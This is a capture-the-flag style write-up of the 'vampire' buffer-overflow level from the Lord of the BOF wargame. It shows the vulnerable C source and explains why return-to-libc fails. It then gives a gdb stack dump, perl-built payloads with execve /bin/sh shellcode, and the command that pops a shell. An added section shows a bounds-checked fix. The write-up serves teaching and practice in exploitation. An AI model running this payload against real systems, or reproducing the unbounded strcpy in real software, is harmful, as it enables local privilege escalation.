
Compared to level 8, this one was very easy to solve; I guess level 8 was the hurdle.

Looking at the source:

[troll@localhost troll]$ cat vampire.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

The block marked in bold (the one under `// here is changed!`) is what was added. So if the return address has the form

bf (tested by the existing check) ff (tested by the newly added check) -- --

it is caught on the ff byte and the command is refused.
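For comparison, here is what the program looks like once the overflow itself is removed rather than filtered. This is an added example written for this page, not the LOB challenge source; the function names `copy_arg_bounded` and `try_arg` are my own. The point it makes is that the `0xbf` / `0xff` byte tests in vampire.c only constrain what the overwritten return address may look like, while `strcpy()` still writes past the 40-byte buffer; a length check before the copy removes the overwrite entirely, so the value of bytes 46 and 47 no longer matters.

```c
/* Added example (not part of vampire.c): the same program with the
 * unbounded strcpy() replaced by a length check before copying. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSZ 40   /* same size as buffer[40] in vampire.c */

/* Copy src into dst only if it fits, NUL terminator included.
 * Returns 0 on success, -1 if src is too long (dst is left untouched). */
int copy_arg_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Helper with a local 40-byte buffer, mirroring main()'s layout, so the
 * bounds check can be exercised on a string without running the binary. */
int try_arg(const char *arg)
{
    char buffer[BUFSZ];
    return copy_arg_bounded(buffer, sizeof buffer, arg);
}

int main(int argc, char *argv[])
{
    char buffer[BUFSZ];

    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }
    /* A 48-byte argument, which reaches the saved return address in
     * vampire.c, is rejected here instead of being copied. */
    if (copy_arg_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        printf("argument too long (max %d bytes)\n", BUFSZ - 1);
        exit(1);
    }
    printf("%s\n", buffer);
    return 0;
}
```

With this check in place, the 44 filler bytes plus a 4-byte address used in the write-up below never reach the stack frame, whatever the address bytes are; the two `argv[1][47]` / `argv[1][46]` tests in the original are a filter on the payload, not a fix for the bug.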

The first method I tried was RTL, but the addresses look like this:

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

$1 = {<text variable, no debug info>} 0x400a9d48 <__execve>

so they are caught on the bf-------- part and could not be used,


and a symbolic link, putting it in the buffer (not possible), and environment variables all get caught on the --ff---- part, so none of them could be used either.

The last method I thought of was to stuff argv[2] as full as possible to push the starting address down, and this method worked.

First I copied it to /tmp and ran it under the debugger:

[troll@localhost /tmp]$ gcc -o vampire vampire.c
[troll@localhost /tmp]$ gdb -q vampire
(gdb) b main
Breakpoint 1 at 0x8048436
(gdb) r $(perl -e 'print "\x90"x44,"\xbf\xbf\xbf\xbf"') $(perl -e 'print "\x90"x80000,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
Starting program: /tmp/vampire $(perl -e 'print "\x90"x44,"\xbf\xbf\xbf\xbf"') $(perl -e 'print "\x90"x80000,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')

Breakpoint 1, 0x8048436 in main ()
(gdb) x/80000x $esp
0xbffec230: 0xbffec258 0x4000a970 0x400f855b 0x08049584
0xbffec240: 0x4000ae60 0xbffec2a4 0xbffec258 0x0804841b
0xbffec250: 0x08049570 0x08049584 0xbffec278 0x400309cb
0xbffec260: 0x00000003 0xbffec2a4 0xbffec2b4 0x40013868
0xbffec270: 0x00000003 0x08048380 0x00000000 0x080483a1
0xbffec280: 0x08048430 0x00000003 0xbffec2a4 0x080482e0
0xbffec290: 0x080484fc 0x4000ae60 0xbffec29c 0x40013e90
0xbffec2a0: 0x00000003 0xbffec39d 0xbffec3aa 0xbffec3db
0xbffec2b0: 0x00000000 0xbffffc74 0xbffffc7d 0xbffffc95
0xbffec2c0: 0xbffffcb4 0xbffffcd6 0xbffffce1 0xbffffea4
0xbffec2d0: 0xbffffec3 0xbffffede 0xbffffef3 0xbfffff10
0xbffec2e0: 0xbfffff1b 0xbfffff34 0xbfffff42 0xbfffff4a
0xbffec2f0: 0xbfffff5b 0xbfffff65 0xbfffff73 0xbfffff84
0xbffec300: 0xbfffff92 0xbfffff9d 0xbfffffae 0x00000000
0xbffec310: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffec320: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffec330: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffec340: 0x00000009 0x08048380 0x0000000b 0x000001fc
0xbffec350: 0x0000000c 0x000001fc 0x0000000d 0x000001fc
0xbffec360: 0x0000000e 0x000001fc 0x00000010 0x0fabfbff
0xbffec370: 0x0000000f 0xbffec398 0x00000000 0x00000000
0xbffec380: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffec390: 0x00000000 0x00000000 0x36383669 0x6d742f00
0xbffec3a0: 0x61762f70 0x7269706d 0x90900065 0x90909090
0xbffec3b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec3c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec3d0: 0x90909090 0xbfbf9090 0x9000bfbf 0x90909090
0xbffec3e0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec3f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec400: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec410: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec420: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec430: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec440: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec450: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec460: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec470: 0x90909090 0x90909090 0x90909090 0x90909090
...(the NOP sled is huge, so the rest is omitted)


The words marked in bold in the dump (0xbfbf9090 0x9000bfbf on the 0xbffec3d0 line) are where argv[1] ends and argv[2] begins. So if we supply any address from the part after that:


[troll@localhost troll]$ ./vampire $(perl -e 'print "\xbf"x44,"\xe0\xc3\xfe\xbf"') $(perl -e 'print "\x90"x80000,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜煽
bash$ my-pass
euid = 509
music world
bash$

And that is how the shell pops.


cf. The payload that gave an error

I don't know why, but when I put 44 NOPs at the front of argv[1] it didn't work, and when I changed them to \xbf it worked.


[troll@localhost troll]$ ./vampire $(perl -e 'print "\x90"x44","\xe0\xc3\xfe\xbf"') $(perl -e 'print "\x90"x80000,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
String found where operator expected at -e line 1, near "44",""
(Missing operator before ","?)
syntax error at -e line 1, near "44",""
Backslash found where operator expected at -e line 1, near "","\"
(Missing operator before \?)
Backslash found where operator expected at -e line 1, near "xe0\"
Backslash found where operator expected at -e line 1, near "xc3\"
Backslash found where operator expected at -e line 1, near "xfe\"
String found where operator expected at -e line 1, at end of line
(Missing semicolon on previous line?)
Can't find string terminator '"' anywhere before EOF at -e line 1.
stack is still your friend.

